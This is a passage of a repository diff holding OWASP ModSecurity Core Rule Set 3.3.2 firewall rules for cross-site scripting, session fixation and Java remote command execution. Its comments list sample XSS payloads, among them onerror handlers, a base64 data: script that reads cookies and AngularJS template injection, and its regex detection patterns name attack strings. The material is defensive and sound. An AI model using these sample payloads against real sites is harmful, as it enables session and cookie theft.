ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:<META[\s/+].*?charset[\s/+]*=)" \
"id:941260,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)<LINK[\s/+].*?href[\s/+]*=" \
"id:941270,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)<BASE[\s/+].*?href[\s/+]*=" \
"id:941280,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)<APPLET[\s/+>]" \
"id:941290,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)<OBJECT[\s/+].*?(?:type|codetype|classid|code|data)[\s/+]*=" \
"id:941300,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# https://www.owasp.org/www-community/xss-filter-evasion-cheatsheet
# US-ASCII encoding bypass listed on XSS filter evasion
# Reported by Mazin Ahmed
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \xbc[^\xbe>]*[\xbe>]|<[^\xbe]*\xbe" \
"id:941310,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\
msg:'US-ASCII Malformed Encoding XSS Filter - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-tomcat',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# https://nedbatchelder.com/blog/200704/xss_with_utf7.html
# UTF-7 encoding XSS filter evasion for IE.
# Reported by Vladimir Ivanov
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \+ADw-.*(?:\+AD4-|>)|<.*\+AD4-" \
"id:941350,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\
msg:'UTF-7 Encoding IE XSS - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-internet-explorer',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# Defend against JSFuck and Hieroglyphy obfuscation of Javascript code
#
# https://en.wikipedia.org/wiki/JSFuck
# https://github.com/alcuadrado/hieroglyphy
#
# These JS obfuscations mostly aim for client side XSS exploits, hence the
# integration of this rule into the XSS rule group. But serverside JS could
# also be attacked via these techniques.
#
# Detection pattern / Core elements of JSFuck and Hieroglyphy are the
# following two items:
# !![]
# !+[]
#
# ModSecurity always transforms "+" into " " with query strings and the
# URLENCODE body processor (but not for JSON). So we need to check for
# the following patterns:
# !![]
# !+[]
# ! []
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ![!+ ]\[\]" \
"id:941360,\
phase:2,\
block,\
capture,\
t:none,\
msg:'JSFuck / Hieroglyphy obfuscation detected',\
logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242/63',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# Prevent 941180 bypass by using JavaScript global variables
# Refer to: https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/
#
# Examples:
# - /?search=/?a=";+alert(self["document"]["cookie"]);//
# - /?search=/?a=";+document+/*foo*/+.+/*bar*/+cookie;//
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?:self|document|this|top|window)\s*(?:/\*|[\[)]).+?(?:\]|\*/)" \
"id:941370,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:compressWhitespace,\
msg:'JavaScript global variable found',\
logdata:'Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'attack-xss',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242/63',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
#
# This is a stricter sibling of rule 941100.
#
SecRule REQUEST_HEADERS:Referer "@detectXSS" \
"id:941101,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'XSS Attack Detected via libinjection',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
tag:'paranoia-level/2',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
#
# -=[ XSS Filters - Category 5 ]=-
# HTML attributes - src, style and href
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" \
"id:941150,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
msg:'XSS Filter - Category 5: Disallowed HTML Attributes',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
tag:'paranoia-level/2',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
# Detect tags that are the most common direct HTML injection points.
#
# <a href=javascript:...
# <applet src="..." type=text/html>
# <applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html>
# <base href=javascript:...
# <base href=... // change base URL to something else to exploit relative filename inclusion
# <bgsound src=javascript:...
# <body background=javascript:...
# <body onload=...
# <embed src=http://www.example.com/flash.swf allowScriptAccess=always
# <embed src="data:image/svg+xml;
# <frameset><frame src="javascript:..."></frameset>
# <iframe src=javascript:...
# <img src=x onerror=...
# <input type=image src=javascript:...
# <layer src=...
# <link href="javascript:..." rel="stylesheet" type="text/css"
# <link href="http://www.example.com/xss.css" rel="stylesheet" type="text/css"
# <meta http-equiv="refresh" content="0;url=javascript:..."
# <meta http-equiv="refresh" content="0;url=http://;javascript:..." // evasion
# <meta http-equiv="link" rel=stylesheet content="http://www.example.com/xss.css">
# <meta http-equiv="Set-Cookie" content="NEW_COOKIE_VALUE">
# <object data=http://www.example.com
# <object type=text/x-scriptlet data=...
# <object type=application/x-shockwave-flash data=xss.swf>
# <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:...></object> // not verified
# <script>...</script>
# <script src=http://www.example.com/xss.js></script> - TODO add another rule for this
# <script src="data:text/javascript,alert(1)"></script>
# <script src="data:text/javascript;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg=="></script>
# <style>STYLE</style>
# <style type=text/css>STYLE</style>
# <style type=text/javascript>alert('xss')</style>
# <table background=javascript:...
# <td background=javascript:
#
#
# NOTES
#
# - Reference the WASC Script Mapping Project - http://projects.webappsec.org/Script-Mapping
#
# - Not using closing brackets because they are not needed for the
# attacks to succeed. The following seems to work in FF: <body/s/onload=...
#
# - Also, browsers sometimes tend to translate < into >, in order to "repair"
# what they think was a mistake made by the programmer/template designer.
#
# - Browsers are flexible when it comes to what they accept as separator between
# tag names and attributes. The following is commonly used in payloads: <img/src=...
# A better example: <BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^=alert("XSS")>
#
# - Grave accents are sometimes used as an evasion technique (as a replacement for quotes),
# but I don't believe we need to look for quotes anywhere.
#
# - Links do not have to be fully qualified. For example, the following works:
# <script src="//ha.ckers.org/.j">
#
# This rule is also triggered by the following exploit(s):
# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx <(?:a|abbr|acronym|address|applet|area|audioscope|b|base|basefront|bdo|bgsound|big|blackface|blink|blockquote|body|bq|br|button|caption|center|cite|code|col|colgroup|comment|dd|del|dfn|dir|div|dl|dt|em|embed|fieldset|fn|font|form|frame|frameset|h1|head|hr|html|i|iframe|ilayer|img|input|ins|isindex|kdb|keygen|label|layer|legend|li|limittext|link|listing|map|marquee|menu|meta|multicol|nobr|noembed|noframes|noscript|nosmartquotes|object|ol|optgroup|option|p|param|plaintext|pre|q|rt|ruby|s|samp|script|select|server|shadow|sidebar|small|spacer|span|strike|strong|style|sub|sup|table|tbody|td|textarea|tfoot|th|thead|title|tr|tt|u|ul|var|wbr|xml|xmp)\W" \
"id:941320,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:jsDecode,t:lowercase,\
msg:'Possible XSS Attack Detected - HTML Tag Handler',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242/63',\
tag:'PCI/6.5.1',\
tag:'paranoia-level/2',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'][ ]*(?:[^a-z0-9~_:' ]|in).*?(?:(?:l|\\\\u006C)(?:o|\\\\u006F)(?:c|\\\\u0063)(?:a|\\\\u0061)(?:t|\\\\u0074)(?:i|\\\\u0069)(?:o|\\\\u006F)(?:n|\\\\u006E)|(?:n|\\\\u006E)(?:a|\\\\u0061)(?:m|\\\\u006D)(?:e|\\\\u0065)|(?:o|\\\\u006F)(?:n|\\\\u006E)(?:e|\\\\u0065)(?:r|\\\\u0072)(?:r|\\\\u0072)(?:o|\\\\u006F)(?:r|\\\\u0072)|(?:v|\\\\u0076)(?:a|\\\\u0061)(?:l|\\\\u006C)(?:u|\\\\u0075)(?:e|\\\\u0065)(?:O|\\\\u004F)(?:f|\\\\u0066)).*?=)" \
"id:941330,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
tag:'PCI/6.5.1',\
tag:'paranoia-level/2',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
# This rule is also triggered by the following exploit(s):
# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"\'][ ]*(?:[^a-z0-9~_:\' ]|in).+?[.].+?=" \
"id:941340,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,\
msg:'IE XSS Filters - Attack Detected',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-xss',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
tag:'PCI/6.5.1',\
tag:'paranoia-level/2',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
#
# Defend against AngularJS client side template injection
#
# Of course, pure client-side AngularJS commands can not be intercepted.
# But once a command is sent to the server, the CRS will trigger.
#
# https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
#
# Example payload:
# http://localhost/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff
# Decoded argument:
# {{constructor.constructor('alert(1)')()}}
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx {{.*?}}" \
"id:941380,\
phase:2,\
block,\
capture,\
t:none,\
msg:'AngularJS client side template injection detected',\
logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'attack-xss',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242/63',\
tag:'paranoia-level/2',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-941-APPLICATION-ATTACK-XSS"

1595
core/modsecurity/files/coreruleset/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf Normal file
View File

File diff suppressed because it is too large Load Diff

132
core/modsecurity/files/coreruleset/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf Normal file
View File

@@ -0,0 +1,132 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# Session fixation
#
# -=[ References ]=-
# http://projects.webappsec.org/Session-Fixation
# http://projects.webappsec.org/w/page/13246960/Session%20Fixation
# http://capec.mitre.org/data/definitions/61.html
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)" \
"id:943100,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,\
msg:'Possible Session Fixation Attack: Setting Cookie Values in HTML',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-fixation',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/225/21/593/61',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|cfid|cftoken|cfsid|jservsession|jwsession)$" \
"id:943110,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:lowercase,\
msg:'Possible Session Fixation Attack: SessionID Parameter Name with Off-Domain Referer',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-fixation',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/225/21/593/61',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule REQUEST_HEADERS:Referer "@rx ^(?:ht|f)tps?://(.*?)\/" \
"capture,\
chain"
SecRule TX:1 "!@endsWith %{request_headers.host}" \
"setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|cfid|cftoken|cfsid|jservsession|jwsession)$" \
"id:943120,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:lowercase,\
msg:'Possible Session Fixation Attack: SessionID Parameter Name with No Referer',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-fixation',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/225/21/593/61',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule &REQUEST_HEADERS:Referer "@eq 0" \
"setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"

303
core/modsecurity/files/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf Normal file
View File

@@ -0,0 +1,303 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
# Many rules check request bodies, use "SecRequestBodyAccess On" to enable it on main modsecurity configuration file.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
# This rule is also triggered by an Apache Struts exploit:
# [ Apache Struts vulnerability CVE-2017-5638 - Exploit tested: https://github.com/xsscx/cve-2017-5638 ]
#
# This rule is also triggered by an Apache Struts Remote Code Execution exploit:
# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ]
#
# This rule is also triggered by an Apache Struts Remote Code Execution exploit:
# [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ]
#
# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit:
# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ]
#
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \
"@rx java\.lang\.(?:runtime|processbuilder)" \
"id:944100,\
phase:2,\
block,\
t:none,t:lowercase,\
log,\
msg:'Remote Command Execution: Suspicious Java class detected',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-rce',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/137/6',\
tag:'PCI/6.5.2',\
tag:'paranoia-level/1',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
# This rule is also triggered by the following exploit(s):
# [ Apache Struts vulnerability CVE-2017-5638 - Exploit tested: https://github.com/xsscx/cve-2017-5638 ]
